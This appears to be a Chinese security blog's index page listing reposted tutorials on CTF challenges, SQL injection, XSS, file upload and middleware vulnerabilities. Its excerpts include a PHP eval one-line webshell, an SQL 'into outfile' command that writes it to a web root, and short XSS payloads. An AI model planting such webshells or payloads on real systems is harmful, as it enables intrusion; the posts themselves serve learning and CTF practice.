自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(47)
  • 收藏
  • 关注

转载 CTF MISC-USB流量分析出题记录

USB流量分析USB接口是目前最为通用的外设接口之一,通过监听该接口的流量,可以得到很多有意思的东西,例如键盘击键,鼠标移动与点击,存储设备的明文传输通信、USB无线网卡网络传输内容等。1、USB流量的捕获USB流量的捕获可以使用wireshark自带的工具usbpcap来进行安装wirshark时勾选上安装usbpcap即可1.鼠标流量抓包鼠标移动的轨迹,右键,左键...

2019-04-08 15:34:00 2361

转载 python-flask-ssti(模版注入漏洞)

SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式输出无过滤就注定会存在xss,当然还有更多深层次的漏洞。前置知识1.运行一个一个最小的 Flask 应用from flask import Flaskapp = ...

2019-03-05 21:56:00 1200

转载 如何写一个Xss Bot

如何写一个Xss Bot现在的ctf比赛里xss的出题方式比较特殊,一般使用xss bot,所以借鉴大佬经验尝试弄一个xss题目。xss bot就是代替管理员去完成点击页面的任务,bot需要能够执行js,事情的本质是我们需要一个浏览器内核来解析jsxss bot一般会用selenium+webdriverwebdriver一般有3种chrome webdriver、fir...

2019-02-25 10:16:00 577

转载 nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现

nginx解析漏洞,配置不当,目录遍历漏洞复现1.Ubuntu14.04安装nginx-php5-fpm安装了nginx,需要安装以下依赖sudo apt-get install libpcre3 libpcre3-devsudo apt-get install zlib1g.devsudo apt-get install libssl-dev安装php:apt-get i...

2018-12-01 23:45:00 406

转载 weblogic在linux和window下的安装

weblogic在linux和window下的安装weblogic下载地址Windows server2008一直下一步没什么坑centos6.5使用rpm安装jdk8JDK下载安装jdlrpm -ivh jdk-8u191-linux-x64.rpm配置环境变量vim /etc/profile //打开环境变量文件JAVA_HOME=/usr/java/jdk1....

2018-11-21 22:12:00 340

转载 apache-日志-记录post数据

apache access.log日志只能打印出相关的头部信息,例如:Referer, User-agent。但是我希望看到body中的data。目前找到解决方案是使用apache的扩展module: dumpio_module modules/mod_dumpio.so1.apache server加载dumpio模块在httpd.conf总找到如下行:# LoadModul...

2018-11-20 22:09:00 3174

转载 条件竞争漏洞

条件竞争漏洞竞争条件”发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中一、使用FDFD开启抓包,点击购买选中数据包==shift+r==出现多条数据包队列,前几条会是并发点击GO,发送成功,正常大辣条数目应该为4,现在买了11个二、使用burpsuit点击购买,bp抓包设置为空payload,设置发包次数,(线程一定要...

2018-10-14 00:45:00 164

转载 arpspoof+driftnet+ ARP欺骗简单图片抓取

arpspoof+driftnet+ ARP欺骗简单图片抓取driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片环境受害ip:192.168.228.130攻击ip:192.168.228.129网关:192.168.228.2条件1,开启或关闭IP转发2,向被攻击机器发送arp欺骗数据包,冒充网关...

2018-08-31 00:04:00 1631

转载 图片隐写--XOR&OR&and

图片xor的脚本和图片进行xor or and 运算的脚本from PIL import Image#import pildef loadImage(filename): img = Image.open(filename) width, height = img.size img = img.convert("RGB") pixel = img.load() ...

2018-08-22 23:26:00 647

转载 qcow2虚拟磁盘映像转化为vmdk

通过破解一个别人出题的虚拟机学会的虚拟机硬盘镜像转换,通过查看history命令,学会了把虚拟机还原为可用状态。tutum/apache-php docker镜像的使用,还有一些mysql的小姿势,记录一下。qcow2虚拟磁盘映像转化为vmdkyum install qemu-img –yqemu-img info source-name.vmdk 查看虚拟机信息qemu-im...

2018-08-16 22:37:00 776

转载 SQL注入--显注和盲注中过滤逗号绕过

SQL注入逗号绕过1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。绕过在显示位上替换为常见的注入变量或其它语句union select 1,2,3;union select * from ((select 1)A join (se...

2018-08-16 22:24:00 1498

转载 重新学习--中国菜刀

1. 菜刀(1)中国菜刀的请求方式为post。(2)中国菜刀模拟了百度爬虫的user-agent,中国菜刀默认的连接中使用base64的方式进行编码传输,以便逃脱抓捕。<?php eval($_POST['x']); ?>客户端连接设置好URL,密码,连接。一句话木马的核心就是:PHP eval() 函数eval() 函数把字符串按照 ...

2018-08-14 14:14:00 1293

转载 信息收集--子域名发现(填坑)

爆破:使用subDomainsBrute百度云检测:http://ce.baidu.com/index/getRelatedSites?site_address=转载于:https://www.cnblogs.com/hackxf/p/9474346.html

2018-08-14 14:13:00 197

转载 出差总结

总结上周第一次自己出差,遇到各种问题。自己出门凡事都要自己考虑,凡事都要自己去做,挺考验人的,不光工作,出门还要注意安全,不忘带东西,经历过了做个总结让自己少犯些错。1.出门前一定要提前收拾好要带的东西,装好书包。临出门在检查一遍。2.在客户那一定先要了解自己的任务,知道自己负责的事,把自己负责的事做好,不属于自己的一些杂活尽量不做。客户安排不属于自己的活不要去干,干不好还要自己负...

2018-08-01 20:02:00 193

转载 文件批量加密重命名--python脚本AND mysql命令行导入数据库

在考试中学生交上来的报告,需要进行一下文件名加密,这样阅卷老师就不知道是谁的报告了在百度帮助下,完成了加密和解密脚本,加密#!/usr/bin/python # -*- coding: utf-8 -*-# coding:utf8import osimport base64def rename(): i = 0 path = "D://123" ...

2018-07-22 00:15:00 113

转载 Ubuntu设置DNS服务

有时候安装完Ubuntu系统,源换好好还是不能更新,软件也不能下,配置好IP,ping 1.1.1.1是通的,ping 域名就不通了,这是没有DNS解析域名的结果一、Server版:对于Ubuntu和CentOS 6配置都适用。1、修改IP地址打开/etc/network/interfacesvim /etc/network/interfaces加入以下语句:auto e...

2018-07-18 20:29:00 215

转载 Docker--从安装到搭建环境

docker1. ubuntu下安装docker安装docker有两种方法:一种是用官方的bash脚本一键安装。直接一条命令就解决了:$ curl -sSL https://get.docker.com/ | sh另一种是一步一步的安装。ubuntu安装vmtools1.更新apt源命令:sudo vim /etc/apt/sources.list图形化换源...

2018-06-08 13:22:00 102

转载 CTF--zip伪加密

刷题一.BUGKUWEB1. 变量1知识点php两个$$是 可变变量,就是一个变量的变量名可以动态的设置和使用$GLOBALS一个包含了全部变量的全局组合数组。变量的名字就是数组的键<?phpinclude "flag.php"; //包含flag.php这个文件$a = @$_REQUEST['hello']; //$a...

2018-06-05 15:55:00 460

转载 BUGKU--刷题

刷题一.BUGKUWEB1. 变量1知识点php两个$$是 可变变量,就是一个变量的变量名可以动态的设置和使用$GLOBALS一个包含了全部变量的全局组合数组。变量的名字就是数组的键<?phpinclude "flag.php"; //包含flag.php这个文件$a = @$_REQUEST['hello']; //$a...

2018-06-05 15:53:00 209

转载 python练习---小脚本

一.爬子域名#!/usr/bin/python # -*- coding: utf-8 -*-import requestsimport reimport sysdef get(domain): url = 'http://i.links.cn/subdomain/'# payload = ("domain=ycxy.com&b2=1...

2018-05-21 18:28:00 121

转载 XSS--PHPwind5.3复现

xss再分析短payload<svg/onload=alert(1)><body/onfocus=alert``><body/onfocus=confirm``>//过滤alert时用众多过狗xss payload防御xsshtmlspecialchars() 函数把预定义的字符 "<" (小于)和 ">" (大于)转...

2018-05-18 22:01:00 179

转载 网络基础一

网络一.基础计算网络地址(0最小)和广播地址(255最大)(1)、几种配置命令模式switch>  这种提示符表示是在用户命令模式,只能使用一些查看命令。  switch# 这种提示符表示是在特权命令模式。  switch(config)# 这种提示符表示是全局配置模式  switch(config-if)# 端口配置命令模式(2)配置VLANvlan 1...

2018-05-09 18:23:00 445

转载 不老的神器--namp,awvs

要会使用的工具NESSUSnmapawvshydraburpsuit工具的话,都有文档,应该多使用 -h 多看官方文档,就会用了。1.namp基本用法-iL <inputfilename> (从列表中输入)-iR <hostnum> (随机选择目标)-sS :半开放扫描(非3次握手的tcp扫描)使用频率最高的扫描选项:SYN扫描,又称为半...

2018-05-06 18:41:00 142

转载 苏醒的巨人----CSRF

一.CSRF跨站请求伪造(Cross-Site Request Forgery,CSRF)是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)1.可能出现的地方所有的业务点都需要进行测试1. 转账2. 修...

2018-05-04 22:12:00 202

转载 XSS--编码绕过,qcms,鲶鱼cms

一.编码绕过1)HTML进制编码标签中的某些属性值可以使用html十进制、十六进制表示2)JavaScript编码JavaScript支持unicode、八进制、十六进制、十进制等3)URL编码4)base64编码js编码分为8进制 10进制 16进制,unicode编码--\u8进制,10进制直接用eval函数运行把alert('xss')转码eval('')有单引...

2018-05-04 00:32:00 243

转载 XSS----payload,绕过,xss小游戏记录

一.XSS1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览这些网页(或触发其他条件),从而执行其中的恶意代码。1.xss实例代码:test.html<!DOCTYPE html><head><title>xss_test</title></head><body> <for...

2018-05-02 22:36:00 508

转载 sql注入--高权限,load_file读写文件

select '<?php eval($_POST[123]) ?>' into outfile '/var/www/html/1.php';1.MYSQL新特性限制文件写入及替代方法高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限secure_file_priv选项secure_file_priv   ...

2018-05-01 02:26:00 2579

转载 提权基础-----mysql-udf提权

1.总结关于udf提权方法通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连(1).将udf.dll代码的16进制数声明给my_udf_a变量set @my_udf_a=concat('',dll的16进制);(2).建表my_udf_data,字段为data,类型为longblob。udf.dllhttps://pan.baidu.com/...

2018-05-01 02:00:00 128

转载 weblogic AND jboss 反序列化漏洞

1.weblogic反序列化漏洞通过java反序列化漏洞利用工具验证,如图6可知,该漏洞是存在的.现在我们可以执行命令,文件管理,上传shell遇到一个问题,我们选择webshell上传,但是上传我们需要一个我们能进行web访问的路径,但是路径在哪找呢?--------我们可以通过查看页面中的图片属性,然后来进行web路径的寻找。通过F12源码审查,我们可以获取到相关图片的路...

2018-04-27 16:47:00 184

转载 WEB中间件--Jboss未授权访问,加固,绕过

1,Jboss未授权访问部署木马发现存在Jboss默认页面,点进控制页点击 Jboss.deployment 进入应用部署页面也可以直接输入此URL进入http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentS...

2018-04-26 13:09:00 645

转载 WEB中间件--tomcat爆破,burp和python脚本,getshell,war包

1.tomcat 用burpsuit进行弱口令爆破先抓包发送到inturderpayload type 选择custom iterater第一个payload选用户名文件,第二个payload用 : 第三个选密码文件设置base64加密,和去掉URL编码开始攻击,得到用户名密码2.用python脚本进行爆破目前正在学习python,#!/usr/bin/en...

2018-04-26 10:21:00 369

转载 WEB中间件漏洞--IIS

1.iis安装版本一直下一步,选上iis安装端口修改网站目录通过网站发布目录(发布目录任意),新建index.html页面,可以正常访问2.iis6.0解析漏洞(1)文件名解析IIS在处理有分号(;)的文件名时,会截断后面的文件名,造成解析漏洞。test.asp;.jpg文件的内容是: <% response.write("Hello World!")%&g...

2018-04-25 12:43:00 274

转载 文件包含漏洞(RFI)

1文件包含漏洞简介include require include_once require_onceRFI综述RFI是Remote File Inclusion的英文缩写,直译过来就是远程文件包含,文件包含的目的是:程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。一下是一个扫描端口PHP,可...

2018-04-24 19:37:00 970

转载 sql注入记录------类型转换错误---convert()函数,一句话图片马制作

sql注入在联合查询是出现一下错误查不到数据Illegal mix of collations for operation 'UNION'用convert() 转换编码为utf8 或者big5 就可以了http://10.1.2.5:52843/wcms/show.php?id=-33 union all SELECT 1,2,3,4,5,6,7,8,9,10,c...

2018-04-23 18:34:00 813

转载 文件上传----常见的几种形式

1遇到文件上传先抓包,尝试修改后缀大小写,关键字替换为空1.pphphp,修改Content-Type加上gif文件头信息gif89a 和00截断.基本修改以下3处还有截断还有一种是在路径处截断2.htaccess文件上传拿shell1.创建htaccess文件,编辑内容为:SetHandler application/x-httpd...

2018-04-23 18:26:00 933

转载 SQL注入篇二------利用burp盲注,post注入,http头注入,利用burpsuit找注入点,宽字节注入...

1.布尔盲注burpsuit的使用先自己构造好注入语句,利用burpsuit抓包,设置变量,查出想要的信息。比如----查数据库名的ascii码得到数据库构造好语句http://123.206.227.79/Less-8/?id=1' and ascii(sbustr(database(),1,1))=1 --+抓包,发送到intruder,设置变量...

2018-04-20 19:44:00 823

转载 WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

1.爆错注入什么情况想能使用报错注入------------页面返回连接错误信息常用函数updatexml()if...floorextractvalue1 updatexml(1,concat(0x23,payload,0x23),1)1 在concat查询语句后面添加一个标识符,如0x232 updatexml(1,concat(0x23,p...

2018-04-19 19:57:00 175

转载 WEB安全基础之sql注入基础

1.基础sql语句注释 单行注释# %23--+ --加空格多行注释/**/SELECT(VERSION())SELECT(USER())SELECT(database()) 查数据库SELECT(@@datadir) 查数据库路径SELECT(@@version_compile_os) 查系统版本version() 数据库版本load_file() ...

2018-04-18 19:33:00 92

转载 数据库基础

1.mysql安装mysql安全设置(系统会一路问你几个问题,看不懂复制之后翻译,基本上一路yes): mysql_secure_installationmysql安装完后不允许远程连接 执行以下代码:grant all PRIVILEGES on *.* to root@'%' identified by 'root' WITH GRANT OPTI...

2018-04-17 09:17:00 66

转载 python基础

客户端大多数连接都是可靠的TCP连接。创建TCP连接时,主动发起连接的叫客户端,被动响应连接的叫服务器。举个例子,当我们在浏览器中访问新浪时,我们自己的计算机就是客户端,浏览器会主动向新浪的服务器发起连接。如果一切顺利,新浪的服务器接受了我们的连接,一个TCP连接就建立起来的,后面的通信就是发送网页内容了。所以,我们要创建一个基于TCP连接的Socket: 1 #!/usr/...

2018-04-13 23:22:00 80

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除